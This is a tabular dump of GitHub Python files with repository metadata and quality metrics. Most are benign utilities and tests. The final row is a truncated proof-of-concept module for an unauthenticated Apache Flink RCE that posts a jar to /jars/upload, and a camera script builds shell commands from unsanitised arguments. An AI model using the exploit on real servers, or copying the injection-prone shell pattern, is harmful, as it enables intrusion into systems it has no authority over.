hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8755cd1b05ceffa0493eb022ef6a315245e9e2ab | 332 | py | Python | .ycm_extra_conf.py | solson/spideros | a9c34f3aec10283d5623e821d70c2d9fb5fce843 | [
"0BSD"
] | 9 | 2016-07-07T18:12:27.000Z | 2022-03-11T06:41:38.000Z | .ycm_extra_conf.py | solson/spideros | a9c34f3aec10283d5623e821d70c2d9fb5fce843 | [
"0BSD"
] | null | null | null | .ycm_extra_conf.py | solson/spideros | a9c34f3aec10283d5623e821d70c2d9fb5fce843 | [
"0BSD"
] | null | null | null | import os
def FlagsForFile(filename, **kwargs):
os.chdir(os.path.dirname(os.path.abspath(__file__)))
flags = os.popen('scons -Q ycm=1').read().split()
# Force YCM to recognize all files as C++, including header files
flags.extend(['-x', 'c++'])
return {
'flags': flags,
'do_cache': True
}
| 23.714286 | 69 | 0.60241 | 45 | 332 | 4.333333 | 0.755556 | 0.061538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003891 | 0.225904 | 332 | 13 | 70 | 25.538462 | 0.754864 | 0.189759 | 0 | 0 | 0 | 0 | 0.11985 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
875cb8cbaa0fe6b6a1719f73429c58c0603f7d8b | 1,168 | py | Python | contrib/performance/graph.py | eventable/CalendarServer | 384444edb1966b530bc391789afbe3fb9cd6fd3e | [
"Apache-2.0"
] | 1 | 2017-02-18T19:22:19.000Z | 2017-02-18T19:22:19.000Z | contrib/performance/graph.py | eventable/CalendarServer | 384444edb1966b530bc391789afbe3fb9cd6fd3e | [
"Apache-2.0"
] | null | null | null | contrib/performance/graph.py | eventable/CalendarServer | 384444edb1966b530bc391789afbe3fb9cd6fd3e | [
"Apache-2.0"
] | null | null | null | ##
# Copyright (c) 2010-2015 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import sys
from matplotlib import pyplot
import numpy
from benchlib import load_stats
def main():
fig = pyplot.figure()
ax = fig.add_subplot(111)
data = [samples for (_ignore_stat, samples) in load_stats(sys.argv[1:])]
bars = []
color = iter('rgbcmy').next
w = 1.0 / len(data)
xs = numpy.arange(len(data[0]))
for i, s in enumerate(data):
bars.append(ax.bar(xs + i * w, s, width=w, color=color())[0])
ax.set_xlabel('sample #')
ax.set_ylabel('seconds')
ax.legend(bars, sys.argv[1:])
pyplot.show()
| 28.487805 | 76 | 0.689212 | 181 | 1,168 | 4.40884 | 0.624309 | 0.075188 | 0.032581 | 0.0401 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022364 | 0.196062 | 1,168 | 40 | 77 | 29.2 | 0.827476 | 0.494007 | 0 | 0 | 0 | 0 | 0.036649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87600684cfa7503e26d347dadd2d740320b15700 | 4,813 | py | Python | limix/mtset/core/splitter_bed.py | fpcasale/limix | a6bc2850f243fe779991bb53a24ddbebe0ab74d2 | [
"Apache-2.0"
] | null | null | null | limix/mtset/core/splitter_bed.py | fpcasale/limix | a6bc2850f243fe779991bb53a24ddbebe0ab74d2 | [
"Apache-2.0"
] | null | null | null | limix/mtset/core/splitter_bed.py | fpcasale/limix | a6bc2850f243fe779991bb53a24ddbebe0ab74d2 | [
"Apache-2.0"
] | null | null | null | import sys
import h5py
import pdb
import scipy as SP
import scipy.stats as ST
import scipy.linalg as LA
import time as TIME
import copy
import warnings
import os
import csv
def splitGeno(
pos,
method='slidingWindow',
size=5e4,
step=None,
annotation_file=None,
cis=1e4,
funct=None,
out_file=None):
"""
split geno into windows and store output in csv file
Args:
pos: genomic position in the format (chrom,pos)
method: method used to slit the windows:
'slidingWindow': uses a sliding window
'geneWindow': uses windows centered on genes
size: window size used in slidingWindow method
step: moving step used in slidingWindow method
annotation_file: file containing the annotation file for geneWindow method
out_file: output csv file
"""
assert method in ['slidingWindow', 'geneWindow'], 'method not known'
# create folder if does not exists
out_dir, fname = os.path.split(out_file)
if (out_dir != '') and (not os.path.exists(out_dir)):
os.makedirs(out_dir)
# calculates windows using the indicated method
if method == 'slidingWindow':
nWnds, nSnps = splitGenoSlidingWindow(
pos, out_file, size=size, step=step)
elif method == 'geneWindow':
# out = splitGenoGeneWindow(pos,out_file,annotation_file=annotation_file,cis=cis,funct=funct)
pass
return nWnds, nSnps
def splitGenoSlidingWindow(pos, out_file, size=5e4, step=None):
"""
split into windows using a slide criterion
Args:
size: window size
step: moving step (default: 0.5*size)
Returns:
wnd_i: number of windows
nSnps: vector of per-window number of SNPs
"""
if step is None:
step = 0.5 * size
chroms = SP.unique(pos[:, 0])
RV = []
wnd_i = 0
wnd_file = csv.writer(open(out_file, 'w'), delimiter='\t')
nSnps = []
for chrom_i in chroms:
Ichrom = pos[:, 0] == chrom_i
idx_chrom_start = SP.where(Ichrom)[0][0]
pos_chr = pos[Ichrom, 1]
start = pos_chr.min()
pos_chr_max = pos_chr.max()
while True:
if start > pos_chr_max:
break
end = start + size
Ir = (pos_chr >= start) * (pos_chr < end)
_nSnps = Ir.sum()
if _nSnps > 0:
idx_wnd_start = idx_chrom_start + SP.where(Ir)[0][0]
nSnps.append(_nSnps)
line = SP.array([wnd_i, chrom_i, start, end,
idx_wnd_start, _nSnps], dtype=int)
wnd_file.writerow(line)
wnd_i += 1
start += step
nSnps = SP.array(nSnps)
return wnd_i, nSnps
def splitGenoGeneWindow(
self,
annotation_file=None,
cis=1e4,
funct='protein_coding'):
"""
split into windows based on genes
"""
# 1. load annotation
assert annotation_file is not None, 'Splitter:: specify annotation file'
try:
f = h5py.File(annotation_file, 'r')
geneID = f['geneID'][:]
gene_chrom = f['chrom'][:]
gene_start = f['start'][:]
gene_end = f['end'][:]
gene_strand = f['strand'][:]
gene_function = f['function'][:]
f.close()
except BaseException:
print('Splitter:: format annotation file not valid')
# if funct is not None, it has to be a list
if funct is not None and funct != list:
funct = [funct]
windows = []
nSnps = []
Igene = []
# 2. calculates windows
for gene_i in range(geneID.shape[0]):
if funct is not None:
if gene_function[gene_i] not in funct:
Igene.append(False)
continue
wnd = [
gene_chrom[gene_i],
gene_start[gene_i] - cis,
gene_end[gene_i] + cis]
Ir = (self.chrom == wnd[0]) * \
(self.pos >= wnd[1]) * (self.pos <= wnd[2])
_nSnps = Ir.sum()
if _nSnps >= minSnps and _nSnps <= maxSnps:
windows.append(wnd)
nSnps.append(_nSnps)
Igene.append(True)
else:
Igene.append(False)
Igene = SP.array(Igene)
self.info['nSnps'] = SP.array(nSnps)
self.info['geneID'] = geneID[Igene]
self.info['gene_start'] = gene_start[Igene]
self.info['gene_end'] = gene_end[Igene]
self.info['gene_strand'] = gene_strand[Igene]
self.info['gene_function'] = gene_function[Igene]
return SP.array(windows)
if __name__ == "__main__":
data = './../data/1000G_chr22/chrom22'
window_size = 1e4
precompute_windows(data, size=window_size, plot=True)
| 30.462025 | 101 | 0.571161 | 603 | 4,813 | 4.412935 | 0.271973 | 0.052612 | 0.024427 | 0.025554 | 0.094701 | 0.021796 | 0 | 0 | 0 | 0 | 0 | 0.012262 | 0.322252 | 4,813 | 157 | 102 | 30.656051 | 0.803495 | 0.212757 | 0 | 0.107143 | 0 | 0 | 0.079663 | 0.007885 | 0 | 0 | 0 | 0 | 0.017857 | 1 | 0.026786 | false | 0.008929 | 0.098214 | 0 | 0.151786 | 0.008929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8760be4a49dcada94b6edc683340f8b51aad145b | 4,021 | py | Python | python/birdVid/jetsonvid.py | plertvilai/birdCam_jetson | 8e74bbc81c289b3e0158edbd471fda0f3ed2b9fb | [
"MIT"
] | null | null | null | python/birdVid/jetsonvid.py | plertvilai/birdCam_jetson | 8e74bbc81c289b3e0158edbd471fda0f3ed2b9fb | [
"MIT"
] | null | null | null | python/birdVid/jetsonvid.py | plertvilai/birdCam_jetson | 8e74bbc81c289b3e0158edbd471fda0f3ed2b9fb | [
"MIT"
] | null | null | null | import os
import signal
import subprocess
import time
import argparse
#--------------Argument Parser-----------------------#
parser = argparse.ArgumentParser(description = "NVIDIA JETSON GSTREAMER VIDEO CONTROLLER")
parser.add_argument("-f", "--format", type=str, default="mp4",help="Select video format: mp4 or avi")
parser.add_argument("-t", "--duration", type=int, default=10,help="Select duration of recording in seconds")
parser.add_argument("-o", "--output", type=str, default=" ",help="Output filename without extension")
parser.add_argument("-s", "--shutter", type=int, default=1000,help="Exposure time in microseconds")
parser.add_argument("-ag", "--again", type=int, default=4,help="Analog gain")
parser.add_argument("-dg", "--dgain", type=int, default=4,help="Digital gain")
parser.add_argument("-dc", "--dualcam", type=bool, default=False,help="Select True to run dual cameras")
parser.add_argument("-fps", "--framerate", type=int, default=30,help="Select framerate in fps")
parser.add_argument("-ww", "--width", type=int, default=4032,help="Image width. Default 4032.")
parser.add_argument("-hh", "--height", type=int, default=3040,help="Image height. Default 3040.")
args = parser.parse_args()
if args.output==" ":
output_name = str(time.time())
else:
output_name = args.output
if args.format=='mp4' or args.format=='MP4':
cmd0 =("gst-launch-1.0 -e nvarguscamerasrc sensor-id=0 "
"gainrange=\"%d %d\" ispdigitalgainrange=\"%d %d\" exposuretimerange=\"%d %d\" "
"! \"video/x-raw(memory:NVMM),width=%d,height=%d,framerate=%d/1\" !"
" nvv4l2h264enc ! h264parse ! mp4mux ! filesink location=%s_0.mp4") %(args.again,
args.again,args.dgain,args.dgain,args.shutter*1000,args.shutter*1000,
args.width,args.height,args.framerate,output_name)
cmd1 =("gst-launch-1.0 -e nvarguscamerasrc sensor-id=1 "
"gainrange=\"%d %d\" ispdigitalgainrange=\"%d %d\" exposuretimerange=\"%d %d\" "
"! \"video/x-raw(memory:NVMM),width=%d,height=%d,framerate=%d/1\" !"
" nvv4l2h264enc ! h264parse ! mp4mux ! filesink location=%s_1.mp4") %(args.again,
args.again,args.dgain,args.dgain,args.shutter*1000,args.shutter*1000,
args.width,args.height,args.framerate,output_name)
elif args.format=='avi' or args.format=='AVI':
cmd0 =("gst-launch-1.0 -e nvarguscamerasrc sensor-id=0 "
"gainrange=\"%d %d\" ispdigitalgainrange=\"%d %d\" exposuretimerange=\"%d %d\" "
"! \"video/x-raw(memory:NVMM),width=%d,height=%d,framerate=%d/1\" !"
" nvjpegenc ! avimux ! filesink location=%s_0.avi") %(args.again,
args.again,args.dgain,args.dgain,args.shutter*1000,args.shutter*1000,
args.width,args.height,args.framerate,output_name)
cmd1 =("gst-launch-1.0 -e nvarguscamerasrc sensor-id=1 "
"gainrange=\"%d %d\" ispdigitalgainrange=\"%d %d\" exposuretimerange=\"%d %d\" "
"! \"video/x-raw(memory:NVMM),width=%d,height=%d,framerate=%d/1\" !"
" nvjpegenc ! avimux ! filesink location=%s_1.avi") %(args.again,
args.again,args.dgain,args.dgain,args.shutter*1000,args.shutter*1000,
args.width,args.height,args.framerate,output_name)
cmd0 =("gst-launch-1.0 -e nvarguscamerasrc sensor-id=0 !"
" \"video/x-raw(memory:NVMM),width=4032,height=3040,framerate=30/1\" !"
" nvjpegenc ! avimux ! filesink location=%s_0.avi") %(args.output)
cmd1 =("gst-launch-1.0 -e nvarguscamerasrc sensor-id=1 !"
" \"video/x-raw(memory:NVMM),width=4032,height=3040,framerate=30/1\" !"
" nvjpegenc ! avimux ! filesink location=%s_1.avi") %(args.output)
else:
print("Invalid requested video format. Please select MP4 or AVI")
quit()
print(cmd0)
if args.dualcam:
print(cmd1)
process0 = subprocess.Popen(cmd0, shell = True)
if args.dualcam:
process1 = subprocess.Popen(cmd1, shell = True)
time.sleep(args.duration+4)
os.killpg(os.getpgid(process0.pid), signal.SIGINT)
if args.dualcam:
os.killpg(os.getpgid(process1.pid), signal.SIGINT) | 50.898734 | 108 | 0.671475 | 557 | 4,021 | 4.806104 | 0.208259 | 0.008965 | 0.063504 | 0.05678 | 0.537916 | 0.523721 | 0.523721 | 0.523721 | 0.523721 | 0.516997 | 0 | 0.042614 | 0.136285 | 4,021 | 79 | 109 | 50.898734 | 0.728189 | 0.012932 | 0 | 0.409091 | 0 | 0 | 0.33619 | 0.021169 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.075758 | 0 | 0.075758 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876363de67d7e19c2bc42088f35ad5bbb3552735 | 1,301 | py | Python | textual_widgets/status_bar.py | Cvaniak/RichWatch | 9190feff4771e2ab66bfc935c18b08832675ae0a | [
"MIT"
] | 19 | 2021-11-06T13:37:06.000Z | 2022-03-03T13:30:14.000Z | textual_widgets/status_bar.py | Cvaniak/RichWatch | 9190feff4771e2ab66bfc935c18b08832675ae0a | [
"MIT"
] | null | null | null | textual_widgets/status_bar.py | Cvaniak/RichWatch | 9190feff4771e2ab66bfc935c18b08832675ae0a | [
"MIT"
] | null | null | null | from textual.widget import Widget
from datetime import datetime, timedelta
import threading
from rich.panel import Panel
from rich.align import Align
class StatusBar(Widget):
delta_time: timedelta = timedelta(seconds=0)
last_updated: datetime = datetime.now()
auto_refresh: bool = False
def __init__(self, trigger: threading.Event) -> None:
self.trigger = trigger
super(StatusBar, self).__init__()
def update_refresh(self) -> None:
if self.auto_refresh and self.delta_time.total_seconds() > 10:
self.trigger.set()
self.reset_timer()
self.refresh()
def reset_timer(self) -> None:
self.last_updated = datetime.now()
self.delta_time = timedelta(seconds=0)
def on_mount(self) -> None:
self.set_interval(0.2, self.update_refresh)
def toggle_auto_refresh(self) -> None:
self.auto_refresh = not self.auto_refresh
def render(self) -> Panel:
self.delta_time = datetime.now() - self.last_updated
text = (
f"[bold]Auto Refresh: "
f"[{'green' if self.auto_refresh else 'red'}]{self.auto_refresh}[/]\n"
f"[bold]Last Update: [cyan]{str(self.delta_time)[:-7]}"
)
return Panel(Align.center(text, vertical="middle"))
| 31.731707 | 82 | 0.64412 | 166 | 1,301 | 4.861446 | 0.355422 | 0.109046 | 0.092937 | 0.042131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007056 | 0.23751 | 1,301 | 40 | 83 | 32.525 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0.112221 | 0.049193 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.15625 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8763ae338bb7899bfcebd3fd05cc212794853da9 | 550 | py | Python | cnki2bibtex/misc/Configure.py | SNBQT/CNKI_2_BibTeX | 433a7cd5e3b3904cf1ce08943acf0219a46d7f5b | [
"MIT"
] | null | null | null | cnki2bibtex/misc/Configure.py | SNBQT/CNKI_2_BibTeX | 433a7cd5e3b3904cf1ce08943acf0219a46d7f5b | [
"MIT"
] | null | null | null | cnki2bibtex/misc/Configure.py | SNBQT/CNKI_2_BibTeX | 433a7cd5e3b3904cf1ce08943acf0219a46d7f5b | [
"MIT"
] | null | null | null | import os
import re
def setIDFormat(idFormat):
filePath = os.path.join(os.path.expanduser('~'), r".cnki2bib.cfg")
with open(filePath, "w", encoding="utf-8") as f:
f.write("[settings]\nid_format = {}".format(idFormat))
def getIDFormat():
filePath = os.path.join(os.path.expanduser('~'), r".cnki2bib.cfg")
if os.path.exists(filePath):
with open(filePath, "r", encoding="utf-8") as f:
configStr = f.read()
return re.search(r"id_format = (.*)", configStr).group(1)
else:
return "title"
| 28.947368 | 70 | 0.610909 | 74 | 550 | 4.513514 | 0.5 | 0.08982 | 0.083832 | 0.107784 | 0.365269 | 0.275449 | 0.275449 | 0.275449 | 0.275449 | 0.275449 | 0 | 0.011416 | 0.203636 | 550 | 18 | 71 | 30.555556 | 0.751142 | 0 | 0 | 0.142857 | 0 | 0 | 0.158182 | 0.038182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8766a6e9f00642b5a5fdfbdbd3dd11843e43e5fa | 679 | py | Python | pygmyui/pygmy/urls.py | ParikhKadam/pygmy | eecab36204d41f2c446b86e1e71d9e768b54dd1d | [
"MIT"
] | 571 | 2017-11-17T06:12:21.000Z | 2022-03-04T11:58:23.000Z | pygmyui/pygmy/urls.py | ParikhKadam/pygmy | eecab36204d41f2c446b86e1e71d9e768b54dd1d | [
"MIT"
] | 49 | 2017-11-19T08:25:14.000Z | 2022-02-10T07:55:27.000Z | pygmyui/pygmy/urls.py | ParikhKadam/pygmy | eecab36204d41f2c446b86e1e71d9e768b54dd1d | [
"MIT"
] | 104 | 2018-01-11T20:47:42.000Z | 2022-02-27T17:35:48.000Z |
from django.conf.urls import url
from django.views.generic.base import TemplateView
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^dashboard$', views.dashboard, name='dashboard'),
url(r'^shorten$', views.link_shortener, name='link_shortener'),
url(r'^shorten/(?P<code>[a-zA-Z0-9]+)$', views.get_short_link,
name='get_short_link'),
url(r'^link/secret$', views.link_auth, name='link_auth'),
url(r'^check$', views.check_available, name='link_available'),
url(r'^(?P<code>[a-zA-Z0-9]+)$', views.link_unshorten, name='shorten'),
url(r'^(?P<code>[a-zA-Z0-9+]+)$', views.short_link_stats, name='linkstats')
] | 39.941176 | 79 | 0.661267 | 102 | 679 | 4.27451 | 0.323529 | 0.073395 | 0.041284 | 0.055046 | 0.12844 | 0.12844 | 0.12844 | 0.091743 | 0.091743 | 0 | 0 | 0.01005 | 0.120766 | 679 | 17 | 80 | 39.941176 | 0.720268 | 0 | 0 | 0 | 0 | 0 | 0.300442 | 0.119293 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8767256081fc71f1d084a564f165d56367f8cd9c | 2,008 | py | Python | test/test_basic_arithmetics.py | jerry-le/computer-vision | bd81a0561680aa976c21c7902cf929257ffeedda | [
"MIT"
] | 1 | 2018-10-14T02:05:58.000Z | 2018-10-14T02:05:58.000Z | test/test_basic_arithmetics.py | jerry-le/computer-vision | bd81a0561680aa976c21c7902cf929257ffeedda | [
"MIT"
] | 1 | 2018-10-05T01:48:48.000Z | 2018-10-05T01:48:48.000Z | test/test_basic_arithmetics.py | jerry-le/computer-vision | bd81a0561680aa976c21c7902cf929257ffeedda | [
"MIT"
] | null | null | null | import cv2
import numpy as np
from unittest import TestCase
from arithmetics import basic_arithmetics as ba
class TestBasicArithmetic(TestCase):
def setUp(self):
self.image_path = '../asserts/images/elena.jpg'
def test_add_gray_success(self):
gray = cv2.imread(self.image_path, 0)
gray_plus_10 = ba.add(gray, 10)
self.assertEqual(gray_plus_10.shape, gray.shape)
self.assertTrue(np.average(gray_plus_10) > np.average(gray))
def test_add_gray_with_color_input(self):
img = cv2.imread(self.image_path)
try:
gray_plus_10 = ba.add(img, 10)
except Exception as e:
self.assertEqual(str(e), 'Image input must be gray')
def test_subtract_gray_success(self):
gray = cv2.imread(self.image_path, 0)
gray_subtract_10 = ba.subtract(gray, 10)
self.assertEqual(gray_subtract_10.shape, gray.shape)
self.assertTrue(np.average(gray_subtract_10) < np.average(gray))
def test_multiple_gray_success(self):
gray = cv2.imread(self.image_path, 0)
gray_time_2 = ba.multiple(gray, 2)
self.assertEqual(gray_time_2.shape, gray.shape)
self.assertTrue(np.average(gray) < np.average(gray_time_2))
def test_subtract_2_images_success(self):
image_path1 = '../asserts/images/right.jpg'
image_path2 = '../asserts/images/right_2.jpg'
gray1 = cv2.imread(image_path1, 0)
gray2 = cv2.imread(image_path2, 0)
gray_diff = ba.subtract2images(gray1, gray2)
self.assertTrue(gray_diff.shape, gray1.shape)
def test_subtract_2_images_with_different_size(self):
image_path1 = '../asserts/images/elena.jpg'
image_path2 = '../asserts/images/right.jpg'
gray1 = cv2.imread(image_path1, 0)
gray2 = cv2.imread(image_path2, 0)
try:
gray_diff = ba.subtract2images(gray1, gray2)
except Exception as e:
self.assertEqual(str(e), 'Images must be the same size')
| 37.886792 | 72 | 0.667829 | 278 | 2,008 | 4.600719 | 0.215827 | 0.056294 | 0.060985 | 0.056294 | 0.63878 | 0.485536 | 0.347928 | 0.347928 | 0.258014 | 0.190774 | 0 | 0.039795 | 0.224104 | 2,008 | 52 | 73 | 38.615385 | 0.78113 | 0 | 0 | 0.295455 | 0 | 0 | 0.094124 | 0.068227 | 0 | 0 | 0 | 0 | 0.318182 | 1 | 0.159091 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8767c80a7746be422c50eab9a0a2b3e1924aecc9 | 2,006 | py | Python | modules/vulnerabilities/apache/apache-flink-unauth-rce.py | cckuailong/pocsploit | fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a | [
"MIT"
] | 106 | 2022-03-18T06:51:09.000Z | 2022-03-31T19:11:41.000Z | modules/vulnerabilities/apache/apache-flink-unauth-rce.py | cckuailong/pocsploit | fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a | [
"MIT"
] | 5 | 2022-03-27T07:37:32.000Z | 2022-03-31T13:56:11.000Z | modules/vulnerabilities/apache/apache-flink-unauth-rce.py | cckuailong/pocsploit | fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a | [
"MIT"
] | 30 | 2022-03-21T01:27:08.000Z | 2022-03-31T12:28:01.000Z | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Apache Flink Unauth RCE''',
"description": '''''',
"severity": "critical",
"references": [
"https://www.exploit-db.com/exploits/48978",
"https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3",
"https://github.com/LandGrey/flink-unauth-rce"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["apache", "flink", "rce", "intrusive", "unauth"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/jars/upload"""
method = "POST"
data = """--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="poc.jar"
Content-Type:application/octet-stream
{{randstr}}
